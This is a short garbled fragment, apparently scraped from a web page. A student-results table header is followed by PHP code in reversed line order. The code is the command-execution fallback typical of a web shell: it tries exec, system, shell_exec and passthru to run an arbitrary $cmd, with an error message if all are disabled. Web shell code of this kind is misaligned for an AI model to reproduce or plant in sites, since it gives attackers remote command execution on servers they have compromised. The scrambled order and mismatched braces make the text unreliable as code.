Student Name Roll No. Reg. No Course Name Gread Point
}
error("The necessary functions to execute commands are disabled!");
} else {
return $res;
$res = passthru($cmd);
} elseif (function_exists("passthru")) {
return $res;
$res = shell_exec($cmd);
} elseif (function_exists("shell_exec")) {
return $res;
$res = system($cmd);
} elseif (function_exists("system")) {
return $res;
$res = exec($cmd);
} elseif (function_exists("exec")) {
return $res;
proc_close($execute);
fclose($io[2]);
fclose($io[1]);
}